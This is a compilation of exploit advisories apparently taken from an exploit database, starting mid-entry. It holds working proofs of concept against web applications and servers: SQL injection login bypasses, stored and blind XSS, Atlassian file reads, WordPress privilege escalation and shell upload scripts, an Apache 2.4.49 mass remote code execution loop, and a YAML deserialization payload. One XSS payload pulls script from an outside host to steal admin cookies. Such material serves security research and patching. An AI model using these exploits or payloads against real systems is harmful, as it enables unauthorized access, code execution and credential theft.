(http://localhost/lodge/admin/login.php), then use below payload as username and password => Username: ' or 1 -- - Password: ' or 1 -- -

# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass # Date: 2021-10-02 # Exploit Author: Jordan Glover # Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code # Version: v1.0 # Tested on: Windows 10 + XAMPP v3.3.0 Steps-To-Reproduce: Step 1 Go to the admin panel http://localhost/bsenordering/admin/login.php Step 2 – Enter the default admin username janobe and enter password test Step 3 – Click on Sign in and capture the request in the Burp Suite Step 4 – Change the user_email to janobe' or '1'='1 Step 5 – Click forward and now you will be logged in as an admin. POC POST /bsenordering/admin/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 40 Origin: http://localhost Connection: close Referer: http://localhost/bsenordering/admin/login.php Cookie: PHPSESSID=him428198e798r23eagi9mapjk Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 user_email=janobe' or '1'='1&user_pass=test&btnLogin=

# Exploit Title: Student Quarterly Grading System 1.0 - SQLi Authentication Bypass # Date: 04.10.2021 # Exploit Author: Blackhan # Vendor Homepage: https://www.sourcecodester.com/php/14953/student-quarterly-grading-system-using-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14953&title=Student+Quarterly+Grading+System+using+PHP+and+SQLite+Database+Free+Source+Code # Version: 1.0 # Tested on: Windows 10, Kali Linux # Student Quarterly Grading System v1.0 Login page can be bypassed with a simple SQLi to the username parameter. Steps To Reproduce: 1 - Go to the login page http://localhost/grading_system/login.php 2 - Enter the payload to username field as "bypass' or 1=1-- -" without double-quotes and type anything to password field. 3 - Click on "Login" button and you are logged in as administrator. PoC POST /grading_system/Actions.php?a=login HTTP/1.1 Host: localhost Content-Length: 45 sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/grading_system/login.php Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j Connection: close username=bypass'+or+1%3D1--+-&password=bypass

# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS) # Date: 2021-10-03 # Exploit Author: Jordan Glover # Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code # Version: v1.0 # Tested on: Windows 10 + XAMPP v3.3.0 Young Entrepreneur E-Negosyo System 1.0 suffers from a Cross Site Scripting (XSS) vulnerability. Step 1 - Create a new product to sell - http://localhost/bsenordering/admin/products/index.php?view=add Step 2 - Fill out all required fields to create a new product. Input a payload in the product description field - <script>alert(document.cookie)</script> Step 3 - Save the product. The stored XSS triggers for all users that navigate to the home page. POC POST /bsenordering/admin/products/controller.php?action=add HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------375756297829058981022228786743 Content-Length: 1203 Origin: http://localhost Connection: close Referer: http://localhost/bsenordering/admin/products/index.php?view=add Cookie: PHPSESSID=794albocs4b1st3m9hsileorpg Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------375756297829058981022228786743 Content-Disposition: form-data; name="OWNERNAME" Test -----------------------------375756297829058981022228786743 Content-Disposition: form-data; name="OWNERPHONE" 0000000000 -----------------------------375756297829058981022228786743 Content-Disposition: form-data; name="PRODESC" <script>alert(document.cookie)</script> -----------------------------375756297829058981022228786743 Content-Disposition: form-data; name="CATEGORY" 3 -----------------------------375756297829058981022228786743 Content-Disposition: form-data; name="ORIGINALPRICE" 100 -----------------------------375756297829058981022228786743 Content-Disposition: form-data; name="PROPRICE" 100 -----------------------------375756297829058981022228786743 Content-Disposition: form-data; name="PROQTY" 100 -----------------------------375756297829058981022228786743 Content-Disposition: form-data; name="image"; filename="" Content-Type: application/octet-stream -----------------------------375756297829058981022228786743 Content-Disposition: form-data; name="save" -----------------------------375756297829058981022228786743--

# Exploit Title: Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read # Date: 2021-10-05 # Exploit Author: Mayank Deshmukh # Vendor Homepage: https://www.atlassian.com/ # Software Link: https://www.atlassian.com/software/confluence/download-archives # Version: version < 7.4.10 and 7.5.0 ≤ version < 7.12.3 # Tested on: Kali Linux & Windows 10 # CVE : CVE-2021-26085 POC #1 - web.xml GET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1 Host: 127.0.0.1:8090 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close POC #2 - seraph-config.xml GET /s/123cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1 Host: 127.0.0.1:8090 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close POC #3 - pom.properties GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties HTTP/1.1 Host: 127.0.0.1:8090 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close POC #4 - pom.xml GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml HTTP/1.1 Host: 127.0.0.1:8090 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close

# Exploit Title: Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated) # Google Dork: inurl:/wp-content/plugins/thecartpress/ # Date: 04/10/2021 # Exploit Author: spacehen # Vendor Homepage: https://wordpress.org/plugin/thecartpress # Version: <= 1.5.3.6 # Tested on: Ubuntu 20.04.1 import os.path from os import path import json import requests; import sys def print_banner(): print("TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation") print("Author -> space_hen (www.github.com/spacehen)") def print_usage(): print("Usage: python3 exploit.py [target url]") print("Ex: python3 exploit.py https://example.com") def vuln_check(uri): response = requests.get(uri) raw = response.text if ("User name is required" in raw): return True; else: return False; def main(): print_banner() if(len(sys.argv) != 2): print_usage(); sys.exit(1); base = sys.argv[1] ajax_action = 'tcp_register_and_login_ajax' admin = '/wp-admin/admin-ajax.php'; uri = base + admin + '?action=' + ajax_action ; check = vuln_check(uri); if(check == False): print("(*) Target not vulnerable!"); sys.exit(1) data = { "tcp_new_user_name" : "admin_02", "tcp_new_user_pass" : "admin1234", "tcp_repeat_user_pass" : "admin1234", "tcp_new_user_email" : "[email protected]", "tcp_role" : "administrator" } print("Inserting admin..."); response = requests.post(uri, data=data ) if (response.text == "\"\""): print("Success!") print("Now login at /wp-admin/") else: print(response.text) main();

# Exploit Title: Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload # Google Dork: inurl:/wp-content/plugins/mstore-api/ # Date: 22/09/2021 # Exploit Author: spacehen # Vendor Homepage: https://wordpress.org/plugins/mstore-api/ # Version: 2.0.6, possibly higher # Tested on: Ubuntu 20.04.1 import os.path from os import path import json import requests; import sys def print_banner(): print("MStore API < 2.0.6 - Arbitrary File Upload") print("Author -> space_hen (www.github.com/spacehen)") def print_usage(): print("Usage: python3 exploit.py [target url] [shell path]") print("Ex: python3 exploit.py https://example.com ./shell.php") def vuln_check(uri): response = requests.post(uri) raw = response.text if ("Key must be" in raw): return True; else: return False; def main(): print_banner() if(len(sys.argv) != 3): print_usage(); sys.exit(1); base = sys.argv[1] file_path = sys.argv[2] rest_url = '/wp-json/api/flutter_woo/config_file' uri = base + rest_url; check = vuln_check(uri); if(check == False): print("(*) Target not vulnerable!"); sys.exit(1) if( path.isfile(file_path) == False): print("(*) Invalid file!") sys.exit(1) files = {'file' : ( "config.json.php", open(file_path), "application/json" )} print("Uploading shell..."); response = requests.post(uri, files=files ) # response should be location of file print(response.text) main();

# Exploit Title: Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read # Date: 2021-10-05 # Exploit Author: Mayank Deshmukh # Vendor Homepage: https://www.atlassian.com/ # Software Link: https://www.atlassian.com/software/jira/download/data-center # Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1 # Tested on: Kali Linux & Windows 10 # CVE : CVE-2021-26086 POC File #1 - web.xml GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1 Host: 127.0.0.1:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close POC File #2 - seraph-config.xml GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1 Host: 127.0.0.1:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close POC File #3 - decorators.xml GET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1 Host: 127.0.0.1:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close POC File #4 - /jira-webapp-dist/pom.properties GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1 Host: 127.0.0.1:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close POC File #5 - /jira-webapp-dist/pom.xml GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1 Host: 127.0.0.1:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close POC File #6 - /atlassian-jira-webapp/pom.xml GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1 Host: 127.0.0.1:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close POC File #7 - /atlassian-jira-webapp/pom.properties GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1 Host: 127.0.0.1:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close

# Exploit Title: Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure # Date 04.10.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://forum.ait-pro.com/read-me-first/ # Software Link: https://downloads.wordpress.org/plugin/bulletproof-security.5.1.zip # Version: <= 5.1 # Tested on: Ubuntu 18.04 # CVE: CVE-2021-39327 # CWE: CWE-200 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39327/README.md ''' Description: The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1. ''' ''' 'Banner: ''' banner = ''' ______ _______ ____ ___ ____ _ _____ ___ _________ _____ / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ // _ \___ /___ \___ | | | \ \ / /| _| _____ __) | | | |__) | |_____ |_ \ (_) ||_ \ __) | / / | |___ \ V / | |__|_____/ __/| |_| / __/| |_____|__) \__, |__) / __/ / / \____| \_/ |_____| |_____|\___/_____|_| |____/ /_/____/_____/_/ * Sensitive information disclosure @ Author: Ron Jost ''' print(banner) import argparse import requests ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Wordpress Plugin BulletProof Security - Sensitive information disclosure') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH print('') print('[*] Starting Exploit:') print('') paths = ["/wp-content/bps-backup/logs/db_backup_log.txt", "/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"] # Exploit for pathadd in paths: x = requests.get("http://" + target_ip + ':' + target_port + '/' + wp_path + pathadd) print(x.text)

# Exploit Title: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection # Date: 05.10.2021 # Exploit Author: Emel Basayar # Vendor: Odine Solutions - odinesolutions.com # Vendor Homepage: https://odinesolutions.com/software/gatekeeper-simbox-antifraud/ # Version: 1.0 # Category: Webapps # Tested on: Ubuntu 18 TLS # Description : The vulnerability allows an attacker to inject sql commands from search section with 'trafficCycle' parameter. # This vulnerability was discovered during the penetration testing and the vulnerability was fixed. ==================================================== # PoC : SQLi : GET /rass/api/v1/trafficCycle/98 HTTP/1.1 Host: 192.168.1.25 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: application/json Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Authorization: Bearer xm38HruG-htx0jNuM-l9UBCkoz-G7RigZvx Origin: https://192.168.1.25 Connection: close Referer: https://192.168.1.25 Parameter: #1* (URI) Type: error-based Title: PostgreSQL AND error-based - WHERE or HAVING clause Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 5042=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5042=5042) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC)-- yrdB Type: stacked queries Title: PostgreSQL > 8.1 stacked queries (comment) Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98';SELECT PG_SLEEP(5)-- Type: time-based blind Title: PostgreSQL > 8.1 AND time-based blind Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 9405=(SELECT 9405 FROM PG_SLEEP(5))-- PasC --- web application technology: Nginx back-end DBMS: PostgreSQL ====================================================

# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) # Date: 10/05/2021 # Exploit Author: Lucas Souza https://lsass.io # Vendor Homepage: https://apache.org/ # Version: 2.4.49 # Tested on: 2.4.49 # CVE : CVE-2021-41773 # Credits: Ash Daulton and the cPanel Security Team #!/bin/bash if [[ $1 == '' ]]; [[ $2 == '' ]]; then echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] echo ./PoC.sh targets.txt /etc/passwd exit fi for host in $(cat $1); do echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done # PoC.sh targets.txt /etc/passwd # PoC.sh targets.txt /bin/sh whoami

# Exploit Title: Google SLO-Generator 2.0.0 - Code Execution # Date: 2021-09-28 # Exploit Author: Kiran Ghimire # Software Link: https://github.com/google/slo-generator/releases # Version: <= 2.0.0 # Tested on: Linux # CVE: CVE-2021-22557 ############################################################################## *Introduction*: Is a tool to compute and export Service Level Objectives (SLOs), Error Budgets and Burn Rates, using configurations written in YAML (or JSON) format. ############################################################################## *POC:* 1. pip3 install slo-generator==2.0.0 2. 2. Save the below yaml code in a file as exploit.yaml. !!python/object/apply:os.system ["id;whoami"] 3. Run the below command slo-generator migrate -b exploit.yaml ##############################################################################

# Exploit Title: Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting # Date: 2021-10-06 # Exploit Author: Yash Mahajan # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/online-dj-booking-management-system-using-php-and-mysql/ # Version: V 1.0 # Vulnerable endpoint: http://localhost/odms/book-services.php?bookid=1 # Vulnerable Page URI : http://localhost/odms/admin/view-booking-detail.php?editid=10&&bookingid=989913724 # Tested on Windows 10, XAMPP *Steps to Reproduce:* 1) Navigate http://localhost/odms/book-services.php?bookid=1 2) Enter Blind Xss payload `"><script+src=https://yourxsshunterusername.xss.ht>` in "name=","vaddress=" and "addinfo=" parameters and click on "Book". Request: ======== POST /odms/book-services.php?bookid=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 335 Origin: http://localhost Connection: close Referer: http://localhost/odms/book-services.php?bookid=1 Cookie: PHPSESSID=crj216nrjq751tt0gs4o92undb Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 name="><script+src=https://biest.xss.ht></script>&[email protected]&mobnum=9999999999 &edate=2000-10-24&est=6+p.m&eetime=1+p.m&vaddress="><script+src=https://biest.xss.ht></script> &eventtype=Pre+Engagement&addinfo="><script+src=https://biest.xss.ht></script>&submit=Book Now to confirm the vulnerability 3) Login as admin by navigating to http://localhost/odms/admin/login.php. 4) Now as soon as admin visits /view-booking-detail.php to approve the booking, payload fires and attacker will get the details like ip address, cookies of admin 5) Able to steal admin's cookies successfully!! #POC https://ibb.co/Vj3jn2d https://ibb.co/bm9MGdG

# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated) # Date: 07/10/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: [email protected] # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html # Version: 1.0 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### XSS Stored and XSS Reflected # All requests can be sent by both an authenticated and a non-authenticated user # XSS Stored - example vulnerable pages and parameters: * The entire application is susceptible to Stored XSS vulnerabilities, below are examples of pages and parameters * We can upload SVG file from XSS to all places in webapp * We can add evil code from admin account, regular user account and unauthenticated - we needs only request * http://localhost/traffic_offense/admin/?page=user Parameters: - firstname - lastname - user image - svg file with javascript code - XSS * http://localhost/traffic_offense/classes/Master.php?f=save_offense_record Parameters: - date_created - ticket_no - officer_id - officer_name - status - remarks - SVG file with javascript code - XSS * All application is vulnerable # XSS Reflected - example vulnerable pages and parameters: * http://localhost/traffic_offense/admin/?page Parameters: - page * http://localhost/traffic_offense/classes/Login.php Parameters: - username - password * http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present] Parameters: - id * http://localhost/traffic_offense/classes/Master.php Parameters: - id * http://localhost/traffic_offense/classes/Users.php Parameters: - id ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example 1 - XSS Reflected # Request using POST method, payload is in the parameter value id POST /traffic_offense/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------21986352462593413643786432583 Content-Length: 1061 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/?page=user Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------21986352462593413643786432583 Content-Disposition: form-data; name="id" 13<script>alert(1)</script>37 -----------------------------21986352462593413643786432583 Content-Disposition: form-data; name="firstname" hacked [...] ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 01:05:26 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 186 Connection: close Content-Type: text/html; charset=UTF-8 UPDATE users set firstname = 'sdasfd' , lastname = 'fdxfd' , username = 'test2' , `password` = 'ad0234829205b9033196ba818f7a872b' where id = 13<script>alert(1)</script>37 ----------------------------------------------------------------------------------------------------------------------- # Request using GET method, payload is in the parameter value id GET /traffic_offense/admin/offenses/view_details.php?id=13<script>alert(1)</script>37' HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 05:28:35 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 7893 Connection: close Content-Type: text/html; charset=UTF-8 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''13<script>alert(1)</script>37''' at line 1 SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '13<script>alert(1)</script>37'' <br /> [...] ----------------------------------------------------------------------------------------------------------------------- ## Example 2 # XSS Stored # Save JS payload in user profile and add SVG file from vuln script POST /traffic_offense/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------85748650716762987124528102 Content-Length: 4304 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/?page=user Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------85748650716762987124528102 Content-Disposition: form-data; name="id" 1 -----------------------------85748650716762987124528102 Content-Disposition: form-data; name="firstname" admin"/><img src=x onmouseover=alert(1)> -----------------------------85748650716762987124528102 Content-Disposition: form-data; name="lastname" admin"/><img src=x onmouseover=alert(1)> -----------------------------85748650716762987124528102 Content-Disposition: form-data; name="username" admin -----------------------------85748650716762987124528102 Content-Disposition: form-data; name="password" admnin123 -----------------------------85748650716762987124528102 Content-Disposition: form-data; name="img"; filename="xss.svg" Content-Type: image/svg+xml [...]SVG PAYLOAD[...] ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 05:31:29 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 1 ----------------------------------------------------------------------------------------------------------------------- # Request download new user data GET /traffic_offense/admin/?page=user/manage_user&id=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 05:42:04 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24719 [...] <div class="form-group col-6"> <label for="name">First Name</label> <input type="text" name="firstname" id="firstname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required> </div> <div class="form-group col-6"> <label for="name">Last Name</label> <input type="text" name="lastname" id="lastname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required> </div> [...] <div class="form-group col-6 d-flex justify-content-center"> <img src="http://localhost/traffic_offense/uploads/1633584660_xss.svg" alt="" id="cimg" class="img-fluid img-thumbnail"> </div> [...]

